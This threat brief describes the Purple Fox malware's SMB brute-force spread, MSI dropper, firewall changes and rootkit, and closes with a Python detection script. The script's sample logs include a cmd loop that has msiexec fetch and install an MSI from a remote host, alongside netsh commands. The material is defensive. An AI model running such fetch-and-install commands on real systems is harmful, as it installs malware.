Threat Brief – Purple Fox Malware

By: Tyler Horner
2021-March-29

Executive Summary
  • Purple Fox is an active malware campaign targeting Windows machines.
  • Up until recently, Purple Fox’s operators infected machines by using exploit kits and phishing emails.
  • Guardicore Labs have identified a new infection vector of this malware where internet-facing Windows machines are being breached through SMB password brute force.
  • Guardicore Labs have also identified Purple Fox’s vast network of compromised servers hosting its dropper and payloads. These servers appear to be compromised Microsoft IIS 7.5 servers.
  • The Purple Fox malware includes a rootkit which allows the threat actors to hide the malware on the machine and make it difficult to detect and remove.

Mitigation Strategies

The following mitigation strategies should be applied as part of a layered security model.  Legion Cyberworks helps our customers plan, prevent, and prepare for cyber-attacks.  Contact us if you want to get started improving your overall security posture.

  • Block inbound traffic on TCP Port 445 at the network edge
  • Enforce host-based firewalls on workstation endpoints to block inbound traffic on TCP Port 445, with exceptions only as needed
  • Run a top-tier EDR solution, such as Sophos Intercept X Advanced with EDR, on all workstation and server endpoints, and conduct regular threat hunts
  • Filter inbound emails for phishing, malware, and other threats
  • Conduct frequent security awareness training for your employees and test them to identify and remediate those who need more help spotting and defending against cyber-attacks like phishing

Cyber-Threat Intelligence

Purple Fox is a malware first discovered in 2018 that previously relied on exploit kits and phishing emails to spread. However, a new campaign has revealed a new propagation method leading to high infection numbers. Guardicore Labs said that Purple Fox is now being spread through “indiscriminate port scanning and exploitation of exposed SMB services with weak passwords and hashes.” The malware targets Windows machines and repurposes compromised systems to host malicious payloads. Infection chains may begin through internet-facing services containing vulnerabilities, browser exploits sent via phishing, brute-force attacks, or deployment via rootkits including RIG. The vast majority of its host servers are running older versions of Windows Server and Microsoft FTP.

The malware is spread in a few different ways. The first is that the worm payload is executed after a victim's machine is compromised through a vulnerability. The second is the worm payload being sent via email through a phishing campaign. Once code execution is achieved on the victim’s machine, a new service is created whose purpose is to establish persistence and to execute a simple cmd command containing a “for loop.” This command iterates through a number of URLs that host the MSI which installs Purple Fox on the machine. “msiexec” is executed with the “/i” flag in order to download and install the malicious MSI package from one of the hosts. The installer pretends to be a Windows Update package, with Chinese text that translates to “windows update” followed by some random letters. The letters are randomly generated for each MSI installer to produce a different hash, making it difficult to tie different versions of the same MSI together. This is an easy way of evading detection methods such as static signatures. Guardicore was able to discover many different versions of the same MSI and payloads.

Purple Fox is a great example of a cyber-threat that can be successfully prevented by maintaining a strong security posture, including multiple layers of detection and prevention, proper firewall ingress and egress filtering policies, and user education on social engineering attacks, said Clayton Dillard, President of Legion Cyberworks.

As the installer progresses, the installer will extract the payloads and decrypt them from within the msi package. The msi package contains three files:

  • A 64-bit DLL payload (winupdate64)
  • A 32-bit DLL payload (winupdate32)
  • An encrypted file containing a rootkit

The malware then modifies the Windows Firewall by executing multiple netsh commands. It adds a new policy named “Qianye” to the firewall and, under this policy, creates a new filter called “Filter1.” Filter1 prohibits any IP on the internet from connecting to the infected machine on ports 445, 139 and 135 over both TCP and UDP. The last step before restarting the machine is to load the rootkit that is hidden inside the encrypted payload in the MSI package. This rootkit is based on the “hidden” open source rootkit project. The purpose of this rootkit is to hide various registry keys, values, files, etc., as detailed by the project's git repository.

Once the rootkit is loaded, the installer reboots the machine in order to rename the malware DLL to a system DLL file that will be executed on boot. When the machine restarts, the malware is executed as well. After its execution, the malware starts its process: it generates IP ranges and begins scanning them on port 445. As a machine responds to the SMB probe sent to port 445, the malware tries to authenticate to SMB by brute forcing usernames and passwords or by trying to establish a null session. If authentication is successful, the malware creates a service whose name matches the regex AC0[0-9]{1} — e.g. AC01, AC02, AC05 (as mentioned before) that downloads the MSI installation package from one of the many HTTP servers and thus completes the infection loop.
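The behaviours described above (the cmd “for loop” driving msiexec /i against remote URLs, the netsh “Qianye” policy and “Filter1” filter, and services named AC0[0-9]) are observable on the host. The following is an added example, not part of the original brief or of Guardicore's tooling, that runs simple detection rules over constructed Sysmon- and System-log-style lines; the rule names, log format and sample values are this example's own assumptions.

```python
import re

# Constructed sample log lines (not from any real incident), written as
# "<channel>/<event id>: <message>" in the style of Sysmon process-creation
# (event 1) and System service-installation (event 7045) entries.
SAMPLE_LOGS = [
    "Sysmon/1: CommandLine=cmd.exe /c for /l %i in (1,1,10) do msiexec /i http://203.0.113.10/winupdate.msi /q",
    "System/7045: A service was installed in the system. Service Name: AC03 ImagePath: C:\\Windows\\Temp\\x.exe",
    "Sysmon/1: CommandLine=netsh ipsec static add policy name=Qianye",
    "Sysmon/1: CommandLine=netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=me protocol=tcp dstport=445",
    "System/7045: A service was installed in the system. Service Name: Spooler ImagePath: C:\\Windows\\System32\\spoolsv.exe",
    "Sysmon/1: CommandLine=msiexec /i C:\\Installers\\7zip.msi /qn",
]

# Detection rules derived from the brief: the AC0[0-9] service name, a cmd
# "for loop" that invokes msiexec, msiexec /i fetching an MSI over HTTP(S),
# and netsh commands referencing the "Qianye" policy or "Filter1" filter.
# Rule names are this example's own; tune them to your log schema.
RULES = {
    "purplefox_service_name": re.compile(r"Service Name:\s*AC0[0-9](?!\d)"),
    "msiexec_remote_install": re.compile(r"msiexec(?:\.exe)?\b.*\s/i\s+https?://", re.I),
    "cmd_for_loop_msiexec": re.compile(r"\bfor\b.*\bdo\b.*msiexec", re.I),
    "netsh_qianye_filter1": re.compile(r"\bnetsh\b.*\b(?:Qianye|Filter1)\b", re.I),
}


def detect(lines):
    """Return (rule_name, line) pairs for every rule that fires on each line.
    A single line may trigger several rules (e.g. the for-loop and the
    remote msiexec rule both fire on the dropper command)."""
    hits = []
    for line in lines:
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((name, line))
    return hits


def count_by_rule(hits):
    """Aggregate hits per rule so a hunt can be summarised at a glance."""
    counts = {}
    for name, _ in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for name, line in detect(SAMPLE_LOGS):
        print(f"[{name}] {line}")
    print(count_by_rule(detect(SAMPLE_LOGS)))
```

The benign Spooler service and the local 7zip.msi install produce no hits, which is the false-positive check worth keeping when adapting the patterns to real telemetry.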